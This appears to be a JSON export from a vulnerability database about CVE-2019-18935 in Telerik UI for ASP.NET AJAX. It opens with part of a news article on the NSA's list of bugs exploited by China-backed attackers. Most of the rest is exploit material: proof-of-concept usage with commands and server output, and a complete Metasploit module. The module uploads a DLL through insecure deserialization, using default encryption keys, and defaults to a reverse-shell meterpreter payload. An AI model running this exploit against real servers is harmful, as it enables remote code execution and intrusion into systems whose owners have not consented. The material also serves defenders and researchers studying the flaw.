In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches for the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. 
An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. 
It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. 
\u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-27T10:08:23", "description": "telerik is vulnerable to remote code execution. 
A .NET JavaScriptSerializer Deserialization vulnerability through `RadAsyncUpload` allows an attacker to execute malicious code on the server in the context of the `w3wp.exe` process.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T09:22:09", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2020-10-21T01:12:00", "id": "VERACODE:25767", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25767/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:44", "description": "\nTelerik UI - Remote Code Execution via Insecure Deserialization", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "href": "", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\n\nInstall\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\npython3 -m venv env\nsource env/bin/activate\npip3 install -r requirements.txt\n\nRequirements\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. 
PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\n\nUsage\nCompile mixed mode assembly DLL payload\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\n\nbuild_dll.bat sleep.c\nUpload and load payload into application via insecure deserialization\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\n\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\n[*] Local payload name: sleep_2019121205271355_x86.dll\n[*] Destination folder: C:\\Windows\\Temp\n[*] Remote payload name: 1576142987.918625.dll\n\n{'fileInfo': {'ContentLength': 75264,\n 'ContentType': 'application/octet-stream',\n 'DateJson': '1970-01-01T00:00:00.000Z',\n 'FileName': '1576142987.918625.dll',\n 'Index': 0},\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\n 'Telerik.Web.UI, Version=<VERSION>, '\n 'Culture=neutral, '\n 'PublicKeyToken=<TOKEN>',\n 'TempFileName': '1576142987.918625.dll'}}\n\n[*] Triggering deserialization...\n\n<title>Runtime Error</title>\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\n<h2> <i>Runtime Error</i> </h2></span>\n...omitted for brevity...\n\n[*] Response time: 13.01 seconds\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\n\nThanks\n@mwulftange initially discovered this vulnerability. 
@bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-12-19T01:04:29", "description": "Exploit for asp platform in category web applications", "cvss3": {}, "published": "2019-12-18T00:00:00", "type": "zdt", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "1337DAY-ID-33683", "href": "https://0day.today/exploit/description/33683", "sourceData": "Telerik UI - Remote Code Execution via Insecure Deserialization Exploit\r\n\r\nSee the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. 
PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. 
@bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip\n\n# 0day.today [2019-12-18] #", "sourceHref": "https://0day.today/exploit/33683", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-22T05:20:05", "description": "This Metasploit module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 
2020.3.915).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "zdt", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2017-11317"], "modified": "2020-10-21T00:00:00", "id": "1337DAY-ID-35085", "href": "https://0day.today/exploit/description/35085", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak 
Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'],\n ].freeze\n CVE_2019_18935_REFERENCES = [\n ['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization\n ['URL', 'https://github.com/noperator/CVE-2019-18935'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'],\n ['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'],\n ['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'],\n ].freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization',\n 'Description' => %q{\n This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik\n UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET\n assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the\n cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once\n patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. 
'2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll'\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 
'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if [email\u00a0protected]? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request 
to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded 
#{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = 
get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://0day.today/exploit/35085", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:12:16", "description": "A remote code execution vulnerability exists in Progress Telerik UI for Asp.Net Ajax. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Progress Telerik UI Remote Code Execution (CVE-2019-18935)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": 
